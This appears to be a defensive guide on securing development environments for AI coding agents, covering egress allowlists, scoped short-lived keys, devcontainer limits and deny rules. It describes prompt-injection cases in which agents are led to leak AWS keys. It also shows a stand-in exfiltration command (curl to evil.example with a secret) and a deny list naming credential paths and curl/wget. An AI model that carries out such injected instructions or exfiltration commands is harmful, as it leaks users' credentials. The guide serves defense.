Securing a dev environment for an AI coding agent comes down to one assumption: treat the agent as an untrusted intern with your shell. It is useful, fast, and occasionally talked into doing something stupid by text it read in a file, an issue comment, or a web page. A successful prompt injection does not produce a rude sentence — it produces an action: a curl with your ~/.aws credentials in the body, a git push of a branch you never reviewed, a tool call to an API key it was never supposed to touch. The control that survives all of that is not the model. It is the environment.
Anthropic put the principle bluntly in its May 2026 post How we contain Claude, after an attacker phished an employee into running Claude Code with instructions to exfiltrate AWS keys: "the only defense that holds… is the environment, specifically egress controls that block the POST regardless of intent and filesystem boundaries that keep ~/.aws out of reach in the first place." This guide is the practical version of that sentence — scoped keys, locked-down Docker egress, devcontainer caveats, and how to hand secrets around without leaving a copy where an agent can read it.
TL;DR
- Egress control is the one defense to set up first. If the agent cannot POST to an arbitrary host, the stolen secret has nowhere to go — block outbound traffic except an allowlist.
- A devcontainer is isolation, not a complete boundary. Anthropic's own docs warn that with
--dangerously-skip-permissionsit "does not prevent a malicious project from exfiltrating anything accessible inside the container." - Scope keys to the task, not the operator. Prefer short-lived, narrowly scoped tokens; the agent should never hold a credential broader than the job in front of it.
- Never mount host secrets. Keep
~/.sshand cloud credential files out of the container; pass repository-scoped or expiring tokens instead. - Least privilege bounds the blast radius; it does not stop injection. Pair it with deny rules, runtime approval for risky actions, and monitoring.
What is the actual threat from an AI coding agent?
The structural problem is the confused deputy: the agent acts on your behalf and carries your privileges — API keys, a logged-in gh, a cloud credential chain — while taking instructions from text it cannot fully trust. OWASP ranks prompt injection as LLM01, the number-one risk for LLM applications, precisely because the injected instruction borrows the deputy's permissions. The blast radius is whatever the agent can reach: every tool loaded into its context is a callable endpoint, and every readable secret is a candidate for exfiltration.
Two things make this concrete rather than hypothetical. First, the injection source is rarely the user — it is a dependency's README, a GitHub issue the agent was asked to triage, a web page it fetched, or a poisoned MCP tool description. Second, the harm is a normal-looking action. Anthropic's containment team describes the case where the user themselves was the injection vector — phished into pasting malicious instructions — and notes that model-layer defenses cannot help once the human in the loop is the one being manipulated. That is the moment the environment has to catch it.
Why isn't a devcontainer a complete security boundary?
A dev container is the right baseline — it runs the agent as a non-root user, confines command execution to the container, and keeps your host toolchain out of reach. It is genuinely useful isolation. It is not a sandbox you can hand an untrusted repo and walk away from.
Anthropic's dev container documentation states the limit directly: run Claude Code with --dangerously-skip-permissions and the container "does not prevent a malicious project from exfiltrating anything accessible inside the container, including the Claude Code credentials stored in ~/.claude." The same page gives the two rules that matter most:
- Only develop trusted repositories this way, and monitor what the agent does — the container shrinks the blast radius, it does not neutralise a hostile project.
- Never mount host secrets. Keep
~/.sshand cloud credential files on the host; pass repository-scoped or short-lived tokens throughcontainerEnvor a secrets store instead. A credential you mount is a credential the agent — and anything that injects it — can read.
How do I scope and expire API keys for an agent?
The rule that comes out of every agent-security writeup: scope permissions to the task, not to the operator's role. A human engineer might have read-write on the whole database; an agent running a report needs SELECT on two tables and nothing else, enforced at the engine, not requested politely in a prompt. The same logic applies to every key you hand it. See the environment variable security guide for the full secrets hierarchy and rotation playbook, and environment variable best practices for least-privilege defaults.
Three patterns, in order of strength:
| Pattern | What it does | Why it limits exfiltration |
|---|---|---|
| Scoped key | One key per task, minimum permissions, separate per environment. | A leaked key buys the attacker only what that task could already do. |
| Short-lived token | Mint on demand, expire in minutes (OIDC, STS, gh app tokens). | A stolen token is often dead before the attacker can use it. |
| Credential never reaches the agent | A proxy outside the agent's trust boundary injects the key into requests. | There is no secret in the agent's environment to exfiltrate at all. |
The third pattern is the one Anthropic ships in its own product surface: Claude Code's Remote Control uses "multiple short-lived, narrowly scoped credentials, each limited to a specific purpose and expiring independently, to limit the blast radius of any single compromised credential." You can apply the cheaper version today — keep the long-lived key in your CI secret store or a vault, hand the agent an expiring token, and rotate aggressively. A key that lives in a plaintext .env for six months is the worst case; a token that dies in fifteen minutes is the goal.
How do I lock down Docker egress and the filesystem?
Egress control is the defense that holds when everything else fails, because exfiltration needs a network path out. Anthropic's reference dev container ships an init-firewall.sh that blocks all outbound traffic except the domains the agent and your tools actually need — model inference, source control, package registries, telemetry. Everything else is dropped, so a coerced curl https://evil.example/?key=$AWS_SECRET simply never connects.
Pair that with two filesystem and permission controls. Claude Code restricts writes to the working directory and its subfolders by default, and its built-in sandbox (bubblewrap on Linux, seatbelt on macOS) enforces filesystem and network isolation on Bash — Anthropic reports it cut permission prompts by 84% in internal use precisely because the boundary, not a human click, is doing the work. On top of that, deny rules are a cheap, explicit backstop:
{
"permissions": {
"deny": [
"Read(./secrets/**)",
"Read(./.env)",
"Read(~/.aws/**)",
"Read(~/.ssh/**)",
"Bash(curl:*)",
"Bash(wget:*)",
"WebFetch"
]
}
}One honest caveat from Anthropic's docs: curl and wget are already not auto-approved, but a deny rule is what makes the block unconditional. And a TLS-terminating proxy is the only way to inspect or strip credentials from HTTPS traffic — a plain HTTP_PROXY sees an opaque tunnel, not the request body. For anything you truly do not trust, the strongest answer in the security docs is still a disposable VM.
How do I share secrets without leaving a copy?
Onboarding and credential handoff are where secrets leak by habit — pasted into Slack, emailed, dropped in a ticket, then sitting in a searchable archive forever, readable by any agent later pointed at that history. Use a zero-knowledge, burn-on-first-read channel instead. That is exactly what send.env.dev is for: the payload is encrypted in the browser, the server never sees the plaintext, and the link self-destructs after one open. The sharing .env files securely guide covers the full workflow and how it compares to 1Password, Doppler, and SOPS. The rule of thumb: a secret that exists in exactly one place for exactly one read cannot be scraped from a chat log.
A hardening checklist for AI-assisted development
Run an agent against work you do not fully trust only when every line below is true. Most of these are one-time setup; the payoff is that a single bad instruction stays contained.
- Non-root user, working directory only. The agent writes to the repo bind-mount and nothing above it.
- No host secrets mounted. No
~/.ssh, no~/.aws, no cloud credential files — repository-scoped or expiring tokens only. - Egress allowlist. Outbound blocked except inference, source control, registries, and telemetry.
- Deny rules for secrets and network shells. Block reads of secret paths and unconditioned
curl/wget. - Human-in-the-loop for high-risk actions. Deletes, deploys, infra changes, and pushes to
mainrequire explicit approval. - No unattended push to production. A non-interactive job must not push to
main, publish packages, apply infra, or run migrations without a separate approval path. - Monitoring and audit. Log tool calls and watch for anomalous network or filesystem activity — observability is the OWASP control most teams skip.
When does this approach fall short?
- Scoped keys do not stop injection — they cap it. An injected instruction that stays inside the agent's allowed scope still executes. Least privilege shrinks the damage; it does not prevent the act.
- Containers are isolation, not a verdict. A privileged process outside the sandbox decides per-command whether to enforce it, and a persuasive injected prompt or a fatigued approval click can still get something through. Use a disposable VM for genuinely hostile input.
- An allowlist is only as tight as its entries. If your egress allowlist includes a host an attacker can write to — a public gist, a webhook tester, your own telemetry sink — exfiltration has a road out. Audit the allowlist like you audit IAM.
- Defense-in-depth or nothing. No single layer is sufficient. Runtime authorization that lives outside the model's reasoning loop, input validation, and monitoring are the rest of the stack — the OWASP cheat sheet lists nine controls for a reason.
Related reading on env.dev
- Dark Factory: security & governance — the OWASP Agentic Top 10, audit trails, and settings governance for autonomous agents.
- Dev containers — the full devcontainer.json, features, and hardening setup the isolation baseline rests on.
- Sharing .env files securely — zero-knowledge handoff with send.env.dev versus vaults and SOPS.
- Environment variable security — secrets hierarchy, leak detection, rotation, and incident response.
Primary sources
- Anthropic — How we contain Claude (May 2026; the egress-and-filesystem "defense that holds" framing and the user-as-injection-vector incident).
- Anthropic — Claude Code sandboxing (filesystem + network isolation, bubblewrap/seatbelt, the 84% prompt reduction).
- Claude Code — Development containers (the "not a complete boundary" warning, no-host-secrets rule,
init-firewall.sh). - Claude Code — Security (read-only default, deny rules, network-command approval, scoped short-lived credentials).
- OWASP — AI Agent Security Cheat Sheet (least privilege, tool scoping, runtime authorization, human-in-the-loop, monitoring).